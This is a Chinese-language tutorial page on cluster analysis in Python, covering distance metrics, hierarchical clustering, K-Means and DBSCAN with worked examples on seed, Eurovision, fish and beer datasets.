    array([[<AxesSubplot:xlabel='calories', ylabel='calories'>,        <AxesSubplot:xlabel='sodium', ylabel='calories'>,        <AxesSubplot:xlabel='alcohol', ylabel='calories'>,        <AxesSubplot:xlabel='cost', ylabel='calories'>],       [<AxesSubplot:xlabel='calories', ylabel='sodium'>,        <AxesSubplot:xlabel='sodium', ylabel='sodium'>,        <AxesSubplot:xlabel='alcohol', ylabel='sodium'>,        <AxesSubplot:xlabel='cost', ylabel='sodium'>],       [<AxesSubplot:xlabel='calories', ylabel='alcohol'>,        <AxesSubplot:xlabel='sodium', ylabel='alcohol'>,        <AxesSubplot:xlabel='alcohol', ylabel='alcohol'>,        <AxesSubplot:xlabel='cost', ylabel='alcohol'>],       [<AxesSubplot:xlabel='calories', ylabel='cost'>,        <AxesSubplot:xlabel='sodium', ylabel='cost'>,        <AxesSubplot:xlabel='alcohol', ylabel='cost'>,        <AxesSubplot:xlabel='cost', ylabel='cost'>]], dtype=object)

    png

    ]]>
    + 正文

    16 聚类分析

    16.1 聚类分析概述

    16.1.2 距离和相似性

    1. 欧氏距离

    可以简单地描述为多维空间中点与点之间的几何距离.

    $$d(X,Y)=\left[\Sigman_{i=1}(X_i-Y_i)2\right]^{\frac{1}{2}}$$

    2. 曼哈顿距离

    计算从一个点到另一个点所经过的折线距离, 取消了欧氏距离中的平方操作, 使得一些离群点的影响会相对减弱

    $$d(X,Y)=\frac{1}{n}\Sigma^n_{i=1}|X_i-Y_i|$$

    3. 闵可夫斯基距离

    对于高维数据, 闵可夫斯基距离是一种更加流行的距离度量方法

    $$d_p(X, Y)=(\Sigman_{i=1}|X_i-Y_i|p)^{\frac{1}{p}}$$

    其中$p$是待选的指数, 如果$p=1$, 闵可夫斯基变为曼哈顿距离, 如果$p=2$, 闵可夫斯基距离变为欧氏距离

    4. 相关性及相关距离

    可以用皮尔森相关系数度量样本之间的相关性

    $$\rho_{XY}=\frac{COV(X,Y)}{\sqrt{DX}\sqrt{DY}}=\frac{\Sigma^n_{i=1}(X_i-\bar X)(Y_i-\bar Y)}{\sqrt{\Sigma^n_{i=1}(X_i-\bar X)2}\sqrt{\Sigman_{i=1}(Y_i-\bar Y)^2}}$$

    可以用$1-\rho_{XY}$表示相关距离, 当相关性增强时, 相关系数增加, 相关距离会减小, 趋向于 0

    16.1.3 聚类分析的类型

    聚类分析从不同的角度有多种分类方法

    • 基于聚类方法的嵌套性: 基于划分、基于层次

    • 基于聚类方法的准确性: 精确分类、模糊分类

    • 基于分类方法的完全性: 完全聚类、部分聚类

    • 基于簇的特性:

      • 基于原型的聚类: 原型一般指样本空间中一些具有代表性的点.也可以称为基于中心的聚类
      • 基于图的聚类: 以图论为基础, 将聚类问题转换为图的最优划分问题, 簇内的数据对象相互连接, 簇之间的对象没有连接
      • 基于密度的聚类: 利用点的密度作为聚类依据(以这个点为圆心, 以某个值作为半径构成的邻域内点的个数)

    16.2 层次聚类

    层次聚类法是将相近的有关联的点聚合成簇, 产生一个分层次的聚类树

    从聚类的特点上看, 一部分的层次聚类方法有图聚类的特性, 另一部分的层次聚类法有原型聚类的特性

    16.2.2 层次聚类流程

    1. 将每个数据点作为一个簇, 计算每个簇之间的距离矩阵
    2. 合并距离最近的两个簇

    簇之间的距离计算方法:

    • 最小距离, 将两个簇的数据点中距离最近的两个点之间的距离作为这两个簇之间的距离

    $$d(u,v)=min_{i, j}\left[dist(u\left[i\right],v\left[j\right])\right]$$

    • 最大距离, 最大距离的计算方法与最小距离相反, 将两个簇的数据点中距离最远的两个点之间的距离作为这两个簇之间的距离

    $$d(u,v)=max_{i, j}\left[dist(u\left[i\right],v\left[j\right])\right]$$

    • 平均距离, 计算两个簇中的每个数据点之间的距离, 然后将所有距离的均值作为两个簇之间的距离, 计算量较大但更加合理

    $$d(u,v)=\Sigma_{i,j}\frac{dist(u\left[i\right],v\left[j\right])}{(|u|*|v|)}$$

    16.2.3 层次聚类实例

    1. 层次聚类对种子特性数据的分析
    1
    2
    3
    4
    5
    6
    7
    8
    # 引入层次聚类函数, 树状图函数
    from scipy.cluster.hierarchy import linkage, dendrogram
    import matplotlib.pyplot as plt
    # 引入坐标轴显示控制库
    from matplotlib.ticker import MultipleLocator
    import pandas as pd

    %matplotlib inline
    1
    2
    seeds_df = pd.read_csv("seeds-less-rows.csv")
    seeds_df.head()
    area perimeter compactness length width asymmetry_coefficient groove_length grain_variety
    0 14.88 14.57 0.8811 5.554 3.333 1.018 4.956 Kama wheat
    1 14.69 14.49 0.8799 5.563 3.259 3.586 5.219 Kama wheat
    2 14.03 14.16 0.8796 5.438 3.201 1.717 5.001 Kama wheat
    3 13.99 13.83 0.9183 5.119 3.383 5.234 4.781 Kama wheat
    4 14.11 14.26 0.8722 5.520 3.168 2.688 5.219 Kama wheat

    查看种子数据集的类别信息

    1
    seeds_df.grain_variety.value_counts()
    Kama wheat        14Rosa wheat        14Canadian wheat    14Name: grain_variety, dtype: int64

    如果应用上述数据进行层次聚类, 需要去除样本数据集中的类别标识

    1
    2
    3
    varieties = list(seeds_df.pop('grain_variety'))  # 去除类别
    samples = seeds_df.values # 去除 columns
    samples
    array([[14.88  , 14.57  ,  0.8811,  5.554 ,  3.333 ,  1.018 ,  4.956 ],       [14.69  , 14.49  ,  0.8799,  5.563 ,  3.259 ,  3.586 ,  5.219 ],       [14.03  , 14.16  ,  0.8796,  5.438 ,  3.201 ,  1.717 ,  5.001 ],       [13.99  , 13.83  ,  0.9183,  5.119 ,  3.383 ,  5.234 ,  4.781 ],       [14.11  , 14.26  ,  0.8722,  5.52  ,  3.168 ,  2.688 ,  5.219 ],       [13.02  , 13.76  ,  0.8641,  5.395 ,  3.026 ,  3.373 ,  4.825 ],       [15.49  , 14.94  ,  0.8724,  5.757 ,  3.371 ,  3.412 ,  5.228 ],       [16.2   , 15.27  ,  0.8734,  5.826 ,  3.464 ,  2.823 ,  5.527 ],       [13.5   , 13.85  ,  0.8852,  5.351 ,  3.158 ,  2.249 ,  5.176 ],       [15.36  , 14.76  ,  0.8861,  5.701 ,  3.393 ,  1.367 ,  5.132 ],       [15.78  , 14.91  ,  0.8923,  5.674 ,  3.434 ,  5.593 ,  5.136 ],       [14.46  , 14.35  ,  0.8818,  5.388 ,  3.377 ,  2.802 ,  5.044 ],       [11.23  , 12.63  ,  0.884 ,  4.902 ,  2.879 ,  2.269 ,  4.703 ],       [14.34  , 14.37  ,  0.8726,  5.63  ,  3.19  ,  1.313 ,  5.15  ],       [16.84  , 15.67  ,  0.8623,  5.998 ,  3.484 ,  4.675 ,  5.877 ],       [17.32  , 15.91  ,  0.8599,  6.064 ,  3.403 ,  3.824 ,  5.922 ],       [18.72  , 16.19  ,  0.8977,  6.006 ,  3.857 ,  5.324 ,  5.879 ],       [18.88  , 16.26  ,  0.8969,  6.084 ,  3.764 ,  1.649 ,  6.109 ],       [18.76  , 16.2   ,  0.8984,  6.172 ,  3.796 ,  3.12  ,  6.053 ],       [19.31  , 16.59  ,  0.8815,  6.341 ,  3.81  ,  3.477 ,  6.238 ],       [17.99  , 15.86  ,  0.8992,  5.89  ,  3.694 ,  2.068 ,  5.837 ],       [18.85  , 16.17  ,  0.9056,  6.152 ,  3.806 ,  2.843 ,  6.2   ],       [19.38  , 16.72  ,  0.8716,  6.303 ,  3.791 ,  3.678 ,  5.965 ],       [18.96  , 16.2   ,  0.9077,  6.051 ,  3.897 ,  4.334 ,  5.75  ],       [18.14  , 16.12  ,  0.8772,  6.059 ,  3.563 ,  3.619 ,  6.011 ],       [18.65  , 16.41  ,  0.8698,  6.285 ,  3.594 ,  4.391 ,  6.102 ],       [18.94  , 16.32  ,  0.8942,  6.144 ,  3.825 ,  2.908 ,  5.949 ],       [17.36  , 15.76  ,  0.8785,  6.145 ,  3.574 ,  3.526 ,  5.971 ],       [13.32  , 13.94  ,  0.8613,  5.541 ,  3.073 ,  7.035 ,  5.44  ],       [11.43  , 13.13  ,  0.8335,  5.176 ,  2.719 ,  2.221 ,  5.132 ],       [12.01  , 13.52  ,  0.8249,  5.405 ,  2.776 ,  6.992 ,  5.27  ],       [11.34  , 12.87  ,  0.8596,  5.053 ,  2.849 ,  3.347 ,  5.003 ],       [12.02  , 13.33  ,  0.8503,  5.35  ,  2.81  ,  4.271 ,  5.308 ],       [12.44  , 13.59  ,  0.8462,  5.319 ,  2.897 ,  4.924 ,  5.27  ],       [11.55  , 13.1   ,  0.8455,  5.167 ,  2.845 ,  6.715 ,  4.956 ],       [11.26  , 13.01  ,  0.8355,  5.186 ,  2.71  ,  5.335 ,  5.092 ],       [12.46  , 13.41  ,  0.8706,  5.236 ,  3.017 ,  4.987 ,  5.147 ],       [11.81  , 13.45  ,  0.8198,  5.413 ,  2.716 ,  4.898 ,  5.352 ],       [11.27  , 12.86  ,  0.8563,  5.091 ,  2.804 ,  3.985 ,  5.001 ],       [12.79  , 13.53  ,  0.8786,  5.224 ,  3.054 ,  5.483 ,  4.958 ],       [12.67  , 13.32  ,  0.8977,  4.984 ,  3.135 ,  2.3   ,  4.745 ],       [11.23  , 12.88  ,  0.8511,  5.14  ,  2.795 ,  4.325 ,  5.003 ]])

    进行层次聚类

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    # 进行层次聚类
    mergings = linkage(samples, method='complete')

    # 绘制树状图
    plt.figure(figsize=(10,6),dpi=80)
    ax = plt.subplot(111)
    dendrogram(mergings,
    labels=varieties,
    leaf_rotation=90,
    leaf_font_size=10,)
    yminorLocator = MultipleLocator(0.2)
    ax.yaxis.set_minor_locator(yminorLocator)
    plt.show()

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    # 得到某一层次上的分类结果
    from scipy.cluster.hierarchy import fcluster

    # 获取最大分类距离为 6 的层次聚类结果
    labels = fcluster(mergings, 6, criterion='distance')

    df = pd.DataFrame({'labels': labels, 'varieties': varieties})
    # 统计每个簇中不同类别的个数
    ct = pd.crosstab(df['labels'], df['varieties'])
    ct
    varieties Canadian wheat Kama wheat Rosa wheat
    labels
    1 14 3 0
    2 0 0 14
    3 0 11 0
    2. 不同距离计算方式对层次聚类结果的影响
    1
    2
    3
    4
    5
    import pandas as pd

    scores_df = pd.read_csv('eurovision-2016-televoting.csv', index_col=0)
    country_names = list(scores_df.index)
    scores_df.head()
    Armenia Australia Austria Azerbaijan Belgium Bulgaria Croatia Cyprus Czech Republic France ... Lithuania Malta Poland Russia Serbia Spain Sweden The Netherlands Ukraine United Kingdom
    From country
    Albania 2.0 12.0 0.0 0.0 0.0 8.0 0.0 0.0 0.0 0.0 ... 4.0 0.0 5.0 7.0 0.0 0.0 3.0 0.0 6.0 0.0
    Armenia NaN 0.0 4.0 0.0 0.0 0.0 0.0 6.0 0.0 7.0 ... 0.0 5.0 1.0 12.0 0.0 0.0 2.0 0.0 10.0 0.0
    Australia 0.0 NaN 3.0 0.0 12.0 10.0 0.0 0.0 0.0 7.0 ... 1.0 6.0 0.0 5.0 0.0 2.0 0.0 0.0 8.0 4.0
    Austria 0.0 3.0 NaN 0.0 0.0 5.0 0.0 0.0 0.0 1.0 ... 0.0 0.0 12.0 8.0 4.0 0.0 7.0 6.0 10.0 0.0
    Azerbaijan 0.0 2.0 0.0 NaN 0.0 8.0 0.0 0.0 0.0 4.0 ... 0.0 5.0 3.0 12.0 0.0 0.0 0.0 0.0 10.0 0.0

    5 rows × 26 columns

    1
    2
    3
    4
    5
    6
    7
    8
    # 填充 Nan 数据
    scores_df = scores_df.fillna(12)

    from sklearn.preprocessing import normalize

    # 数据归一化处理
    samples = normalize(scores_df.values)
    samples
    array([[0.09449112, 0.56694671, 0.        , ..., 0.        , 0.28347335,        0.        ],       [0.49319696, 0.        , 0.16439899, ..., 0.        , 0.41099747,        0.        ],       [0.        , 0.49319696, 0.12329924, ..., 0.        , 0.32879797,        0.16439899],       ...,       [0.32879797, 0.20549873, 0.24659848, ..., 0.49319696, 0.28769823,        0.        ],       [0.28769823, 0.16439899, 0.        , ..., 0.        , 0.49319696,        0.        ],       [0.        , 0.24659848, 0.        , ..., 0.        , 0.20549873,        0.49319696]])
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    plt.figure(figsize=(10,12),dpi=80)
    plt.subplots_adjust(hspace=0.5)

    # single method distance clustering 最短距离
    mergings = linkage(samples, method='single')
    p1 = plt.subplot(211)
    yminorLocator = MultipleLocator(0.05)
    p1.yaxis.set_minor_locator(yminorLocator)
    dendrogram(mergings,
    labels=country_names,
    leaf_rotation=90,
    leaf_font_size=10,
    )
    p1.set_title("single-min distance",fontsize=18)

    # complete method distance clustering 最长距离
    mergings = linkage(samples, method='complete')
    p2 = plt.subplot(212)
    yminorLocator = MultipleLocator(0.05)
    p2.yaxis.set_minor_locator(yminorLocator)
    dendrogram(mergings,
    labels=country_names,
    leaf_rotation=90,
    leaf_font_size=10,
    )
    p2.set_title("complete-max distance",fontsize=18)

    plt.show()

    png

    16.3 K-Means 聚类

    【机器学习】K-means(非常详细)

    K-means 有一个著名的解释:牧师—村民模型:

    有四个牧师去郊区布道,一开始牧师们随意选了几个布道点,并且把这几个布道点的情况公告给了郊区所有的村民,于是每个村民到离自己家最近的布道点去听课。
    听课之后,大家觉得距离太远了,于是每个牧师统计了一下自己的课上所有的村民的地址,搬到了所有地址的中心地带,并且在海报上更新了自己的布道点的位置。
    牧师每一次移动不可能离所有人都更近,有的人发现 A 牧师移动以后自己还不如去 B 牧师处听课更近,于是每个村民又去了离自己最近的布道点……
    就这样,牧师每个礼拜更新自己的位置,村民根据自己的情况选择布道点,最终稳定了下来

    • 优势: 简单, 快速, 适合常规数据集

    • 劣势: K 值难确定, 复杂度与样本呈线性关系, 很难发现任意形状的簇

    16.3.2 K-Means 算法流程

    • 1 选择 K 个数据点作为数据簇的质心

    • 2 计算每个数据点与 K 个质心之间的距离(可选, 一般是欧氏距离), 将其分配到最近的质心所代表的簇中, 形成 K 个簇

    • 3 重新计算 K 个簇的质心

    • 4 重复 2-3, 直至 K 个簇的质心都不再发生变化

    16.3.4 K-Means 聚类实例

    1. 应用 sklearn.cluster 模块中的 K-Means 进行聚类操作
    1. 读出数据文件中的数据, 分析显示数据的结构
    1
    2
    3
    4
    5
    6
    7
    import matplotlib.pyplot as plt
    from sklearn.cluster import KMeans
    import pandas as pd

    df = pd.read_csv("ch1ex1.csv")
    points = df.values
    df.head()
    0 1
    0 0.065446 -0.768664
    1 -1.529015 -0.429531
    2 1.709934 0.698853
    3 1.167791 1.012626
    4 -1.801101 -0.318613
    1. 原始数据样本的散点图绘制
    1
    2
    3
    4
    5
    6
    7
    plt.figure(figsize=(10, 6), dpi=80)

    xs = points[:, 0]
    ys = points[:, 1]

    plt.scatter(xs, ys)
    plt.show()

    png

    可以看出数据样本点分成形状较规则的 3 个部分, 使用 K-Means 算法进行聚类

    1. 聚类操作
    1
    2
    3
    4
    model = KMeans(n_clusters=3)
    model.fit(points)
    labels = model.predict(points)
    print(labels)
    [1 2 0 0 2 2 0 1 2 2 0 1 2 0 2 1 0 0 1 0 2 1 2 1 1 2 1 1 1 2 0 0 0 2 1 2 1 1 2 1 1 0 2 2 2 1 1 0 1 0 0 0 1 1 1 2 1 1 2 0 2 1 1 0 0 2 0 2 2 1 0 2 0 1 0 2 1 1 1 0 1 2 0 2 2 2 2 1 1 0 2 0 2 1 1 1 0 2 2 0 2 1 2 0 1 0 0 0 2 2 1 2 0 2 2 2 1 2 0 0 1 1 1 1 1 2 0 1 2 2 0 0 2 1 2 1 0 2 0 1 0 0 1 0 0 1 0 2 1 1 1 0 0 2 0 2 1 1 0 2 0 0 0 2 1 1 2 0 0 1 1 0 1 1 2 1 0 0 0 1 1 0 1 0 0 1 2 0 1 1 1 1 2 0 1 2 2 2 1 2 1 1 2 0 0 1 0 1 1 2 2 1 0 2 0 1 0 2 1 2 2 2 2 0 0 0 1 1 2 1 0 2 1 1 2 1 0 0 0 0 0 2 1 1 0 0 1 2 0 2 2 1 1 2 2 2 1 0 1 2 1 0 0 0 0 0 1 1 2 1 1 2 0 0 2 1 0 0 2 2 1 1 1 2 2 1 0 2 2 0 1 1 1 2 1 1 1 2 2 2]

    显示了 300 个数据样本点的聚类结果, 即将它们分别归到 0, 1, 2 这 3 个簇中

    1. 聚类结果的数据显示
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    # 聚类中心
    centroids = model.cluster_centers_
    centroids_x = centroids[:, 0] # 重心 x 坐标
    centroids_y = centroids[:, 1] # 重心 y 坐标

    # 原始数据点
    xs = points[:, 0]
    ys = points[:, 1]

    # 创建标记和颜色 list
    mk0 = ['o', ',', 'v'] # 符号形状
    cs0 = ['r', 'g', 'b'] # 颜色
    mk1 = [] # 各个点的符号形状
    cs1 = [] # 各个点的颜色
    for e in labels:
    mk1.append(mk0[e])
    cs1.append(cs0[e])

    plt.figure(figsize=(10, 6), dpi=120)
    plt.subplot(111)
    for x, y, cr, m in zip(xs, ys, cs1, mk1):
    plt.scatter(x, y, edgecolors=cr, facecolors='none', marker=m)
    plt.scatter(centroids_x, centroids_y, marker='X', s=200, c='k') # 绘制重心
    plt.show()

    png

    2. 显示 K 值对聚类结果的影响

    找不到 seeds.csv 这个文件, 用 seeds-less-rows.csv 代替一下吧

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    import pandas as pd
    from sklearn.cluster import KMeans
    import matplotlib.pyplot as plt

    seeds_df = pd.read_csv('seeds-less-rows.csv')
    varieties = list(seeds_df['grain_variety'])
    del seeds_df['grain_variety']
    samples = seeds_df.values
    ks = range(1, 6)
    inertias = []

    for k in ks:
    # Create a KMeans instance with k clusters: model
    model = KMeans(n_clusters=k)
    # Fit model to samples
    model.fit(samples)
    # Append the inertia to the list of inertias
    inertias.append(model.inertia_)

    plt.figure(figsize=(10,6),dpi=80)
    plt.subplot(111)
    # Plot ks vs inertias
    plt.plot(ks, inertias, '-o')
    plt.xlabel('number of clusters, k')
    plt.ylabel('inertia')
    plt.xticks(ks)
    plt.show()
    C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\cluster\_kmeans.py:1036: UserWarning: KMeans is known to have a memory leak on Windows with MKL, when there are less chunks than available threads. You can avoid it by setting the environment variable OMP_NUM_THREADS=1.  warnings.warn(

    png

    随着 K 值增大, 聚类结果拥有更小的 interias 指标(表示样本数据点到所属簇的质心的距离综合), 结果更具有合理性

    3. 使用 sklearn.pipeline 模块中的 make_pipeline 简化操作
    1
    2
    3
    4
    5
    6
    import pandas as pd

    df = pd.read_csv('fish.csv')
    species = list(df['species'])
    del df['species']
    df.head()
    weight length1 length2 length3 height width
    0 242.0 23.2 25.4 30.0 38.4 13.4
    1 290.0 24.0 26.3 31.2 40.0 13.8
    2 340.0 23.9 26.5 31.1 39.8 15.1
    3 363.0 26.3 29.0 33.5 38.0 13.3
    4 430.0 26.5 29.0 34.0 36.6 15.1

    通过 pipeline 模块, 组合调用数据预处理, 数据聚类等操作, 实现数据的聚类

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    from sklearn.pipeline import make_pipeline
    from sklearn.preprocessing import StandardScaler
    from sklearn.cluster import KMeans

    samples = df.values
    scaler = StandardScaler()
    kmeans = KMeans(n_clusters=4)

    pipeline = make_pipeline(scaler, kmeans)
    pipeline.fit(samples)

    labels = pipeline.predict(samples)
    df = pd.DataFrame({'labels': labels, 'species': species})
    ct = pd.crosstab(df['labels'], df['species'])
    ct
    species Bream Pike Roach Smelt
    labels
    0 33 0 1 0
    1 1 0 19 1
    2 0 17 0 0
    3 0 0 0 13

    16.4 DBSCAN 聚类

    LATER ADD TO QUEUE Clustering with DBSCAN, Clearly Explained!!!(Youtube)

    png

    • Eps- 邻域

      • 由用户设定, 以某个数据点为圆心, 以 Eps 的值为半径, 形成一个邻域
    • MinPts 阈值

      • 度量 Eps- 邻域 内数据点数量的一个阈值. 对二维的数据集而言, 一般取 MinPts = 4
    • 核心点

      • 在数据点的 Eps- 邻域 中, 如果数据点的数量 ≥ Minpts, 则该数据点被称为核心点
    • 边界点

      • 数据点的 Eps- 邻域 中, 数据点的数量 < MinPts, 但该点的 Eps- 邻域 内至少有一个核心点 或 该点落在某个核心点的 Eps- 邻域 内, 则称该数据为边界点
    • 噪声点

      • 在数据点的 Eps- 邻域 中, 数据点的数量<MinPts, 但该点不是边界点, 即该点的 Eps- 邻域 内没有任何一个核心点, 则称该点为噪声点

    16.4.3 DBSCAN 聚类实例

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    #16-10.py

    import numpy as np
    import matplotlib.pyplot as plt
    from sklearn import datasets
    from sklearn.cluster import DBSCAN
    from collections import Counter
    %matplotlib inline

    plt.figure(figsize=(12,8),dpi=100)

    # Generate the Data Source with sklearn
    """
    make_moons 是函数用来生成数据集
    n_numbers:生成样本数量
    shuffle:数据是否打乱
    noise:默认是 false,数据集是否加入高斯噪声
    random_state:生成随机种子,给定一个 int 型数据,能够保证每次生成数据相同。
    """
    X1, _ = datasets.make_moons(n_samples=500, noise=.05)
    X2, _ = datasets.make_blobs(n_samples=100, n_features=2, centers=[[1.2,1.2]],
    cluster_std=[[.1]],random_state=9)
    X = np.concatenate((X1, X2))

    # colors and markers for the scatter graph
    # 前 6 个为分类标识, 最后一个为噪声点标识
    colors = ['black','green','yellow','brown','blue','orange','red']
    markers = ['o',',','v','^','<','>','x']

    # Graph for the Data Source
    p11 = plt.subplot(221)
    p11.set_title('Data Source Graph')
    plt.scatter(X[:, 0], X[:, 1],c=colors[0], marker=markers[0])

    # Graph for the clustering with default params
    p12 = plt.subplot(222)
    p12.set_title('Clustering BY DB with Defaut params')
    y_pred = DBSCAN().fit_predict(X)
    for x,y,i in zip(X[:,0],X[:,1],y_pred):
    plt.scatter(x,y,c=colors[i],marker=markers[i])

    # Graph for the clustering with specified params
    p21 = plt.subplot(223)
    p21.set_title('Clustering BY DB with Eps=0.1')
    y_pred = DBSCAN(eps = 0.10, min_samples = 10).fit_predict(X)
    for x,y,i in zip(X[:,0],X[:,1],y_pred):
    plt.scatter(x,y,c=colors[i],marker=markers[i])

    # Graph for the clustering with specified params
    p22 = plt.subplot(224)
    p22.set_title('Clustering BY DB with Eps=0.12')
    y_pred = DBSCAN(eps = 0.12, min_samples = 10).fit_predict(X)
    for x,y,i in zip(X[:,0],X[:,1],y_pred):
    plt.scatter(x,y,c=colors[i],marker=markers[i])

    plt.show()

    png

    16.5 综合实例——聚类分析

    使用 K-Means 算法和 DBSCAN 算法分析一个有关啤酒的数据集

    1 数据集读入及预处理

    1
    2
    3
    4
    import pandas as pd

    beer = pd.read_csv('data.txt', sep=' ')
    beer
    name calories sodium alcohol cost
    0 Budweiser 144 15 4.7 0.43
    1 Schlitz 151 19 4.9 0.43
    2 Lowenbrau 157 15 0.9 0.48
    3 Kronenbourg 170 7 5.2 0.73
    4 Heineken 152 11 5.0 0.77
    5 Old_Milwaukee 145 23 4.6 0.28
    6 Augsberger 175 24 5.5 0.40
    7 Srohs_Bohemian_Style 149 27 4.7 0.42
    8 Miller_Lite 99 10 4.3 0.43
    9 Budweiser_Light 113 8 3.7 0.40
    10 Coors 140 18 4.6 0.44
    11 Coors_Light 102 15 4.1 0.46
    12 Michelob_Light 135 11 4.2 0.50
    13 Becks 150 19 4.7 0.76
    14 Kirin 149 6 5.0 0.79
    15 Pabst_Extra_Light 68 15 2.3 0.38
    16 Hamms 139 19 4.4 0.43
    17 Heilemans_Old_Style 144 24 4.9 0.43
    18 Olympia_Goled_Light 72 6 2.9 0.46
    19 Schlitz_Light 97 7 4.2 0.47

    2 K-Means 聚类

    1
    2
    3
    4
    5
    6
    7
    8
    9
    from sklearn.cluster import KMeans

    X = beer[['calories', 'sodium', 'alcohol', 'cost']]

    km2 = KMeans(n_clusters=2).fit(X) # K = 2 时的聚类结果
    km3 = KMeans(n_clusters=3).fit(X) # K = 3 时的聚类结果
    beer['cluster2'] = km2.labels_
    beer['cluster3'] = km3.labels_
    beer.sort_values('cluster2')
    name calories sodium alcohol cost cluster2 cluster3
    0 Budweiser 144 15 4.7 0.43 0 0
    1 Schlitz 151 19 4.9 0.43 0 0
    2 Lowenbrau 157 15 0.9 0.48 0 0
    3 Kronenbourg 170 7 5.2 0.73 0 0
    4 Heineken 152 11 5.0 0.77 0 0
    5 Old_Milwaukee 145 23 4.6 0.28 0 0
    6 Augsberger 175 24 5.5 0.40 0 0
    7 Srohs_Bohemian_Style 149 27 4.7 0.42 0 0
    17 Heilemans_Old_Style 144 24 4.9 0.43 0 0
    16 Hamms 139 19 4.4 0.43 0 0
    10 Coors 140 18 4.6 0.44 0 0
    12 Michelob_Light 135 11 4.2 0.50 0 0
    13 Becks 150 19 4.7 0.76 0 0
    14 Kirin 149 6 5.0 0.79 0 0
    15 Pabst_Extra_Light 68 15 2.3 0.38 1 2
    9 Budweiser_Light 113 8 3.7 0.40 1 1
    18 Olympia_Goled_Light 72 6 2.9 0.46 1 2
    8 Miller_Lite 99 10 4.3 0.43 1 1
    11 Coors_Light 102 15 4.1 0.46 1 1
    19 Schlitz_Light 97 7 4.2 0.47 1 1

    3 聚类结果分析

    1
    beer.groupby('cluster2').mean()
    calories sodium alcohol cost cluster3
    cluster2
    0 91.833333 10.166667 3.583333 0.433333 0.666667
    1 150.000000 17.000000 4.521429 0.520714 1.000000
    1
    beer.groupby('cluster3').mean()
    calories sodium alcohol cost cluster2
    cluster3
    0 102.75 10.0 4.075000 0.440000 0.0
    1 150.00 17.0 4.521429 0.520714 1.0
    2 70.00 10.5 2.600000 0.420000 0.0

    4 聚类结果的图形显示

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    import matplotlib.pyplot as plt
    import numpy as np
    from pandas.plotting import scatter_matrix

    plt.rcParams['font.size'] = 14
    plt.rcParams['figure.figsize'] = (10, 6)

    centers = beer.groupby('cluster3').mean().reset_index()
    colors = np.array(['red', 'green', 'blue', 'yellow'])
    markers = np.array(['o', ',', 'v', '^'])
    for x, y, cr, mr in zip(beer['calories'], beer['alcohol'], colors[beer['cluster3']], markers[beer['cluster3']]):
    plt.scatter(x, y, c=cr, marker=mr)
    plt.scatter(centers.calories, centers.alcohol, linewidths=3, marker='+', s=300, c='black')
    plt.xlabel('Calories')
    plt.ylabel('Alcohol')
    plt.title('Clustering Result with K = 3')

    # K = 2
    scatter_matrix(beer[['calories', 'sodium', 'alcohol', 'cost']], s=100, alpha=1,
    c=colors[beer["cluster2"]], figsize=(10, 10))
    plt.suptitle("With 2 centroids initialized", x=0.5, y=0.92)

    # K = 3
    scatter_matrix(beer[['calories', 'sodium', 'alcohol', 'cost']], s=100, alpha=1,
    c=colors[beer["cluster3"]], figsize=(10, 10))
    plt.suptitle("With 3 centroids initialized", x=0.5, y=0.92)

    plt.show()

    png

    png

    png

    5 数据经标准化之后的聚类分析

    sklearn 库的 StandardScaler 模型提供了一种数据标准化方法, 主要用于数据列的变换

    $$z=\frac{x-\mu}{s}$$

    $x$表示待标准化的数据, $\mu$表示数据的均值, $s$表示数据的标准差

    1
    2
    3
    4
    5
    from sklearn.preprocessing import StandardScaler

    scaler = StandardScaler()
    X_scaled = scaler.fit_transform(X)
    X_scaled
    array([[ 0.38791334,  0.00779468,  0.43380786, -0.45682969],       [ 0.6250656 ,  0.63136906,  0.62241997, -0.45682969],       [ 0.82833896,  0.00779468, -3.14982226, -0.10269815],       [ 1.26876459, -1.23935408,  0.90533814,  1.66795955],       [ 0.65894449, -0.6157797 ,  0.71672602,  1.95126478],       [ 0.42179223,  1.25494344,  0.3395018 , -1.5192243 ],       [ 1.43815906,  1.41083704,  1.1882563 , -0.66930861],       [ 0.55730781,  1.87851782,  0.43380786, -0.52765599],       [-1.1366369 , -0.7716733 ,  0.05658363, -0.45682969],       [-0.66233238, -1.08346049, -0.5092527 , -0.66930861],       [ 0.25239776,  0.47547547,  0.3395018 , -0.38600338],       [-1.03500022,  0.00779468, -0.13202848, -0.24435076],       [ 0.08300329, -0.6157797 , -0.03772242,  0.03895447],       [ 0.59118671,  0.63136906,  0.43380786,  1.88043848],       [ 0.55730781, -1.39524768,  0.71672602,  2.0929174 ],       [-2.18688263,  0.00779468, -1.82953748, -0.81096123],       [ 0.21851887,  0.63136906,  0.15088969, -0.45682969],       [ 0.38791334,  1.41083704,  0.62241997, -0.45682969],       [-2.05136705, -1.39524768, -1.26370115, -0.24435076],       [-1.20439469, -1.23935408, -0.03772242, -0.17352445]])

    大部分数据都在-2~2 之间, 数据范围基本一致

    1
    2
    3
    4
    # 对标准化后的数据重新进行 K-Means 聚类
    km = KMeans(n_clusters=3).fit(X_scaled)
    beer["scaled_cluster"] = km.labels_
    beer.sort_values('scaled_cluster')
    name calories sodium alcohol cost cluster2 cluster3 scaled_cluster
    9 Budweiser_Light 113 8 3.7 0.40 0 0 0
    15 Pabst_Extra_Light 68 15 2.3 0.38 0 2 0
    12 Michelob_Light 135 11 4.2 0.50 1 1 0
    11 Coors_Light 102 15 4.1 0.46 0 0 0
    18 Olympia_Goled_Light 72 6 2.9 0.46 0 2 0
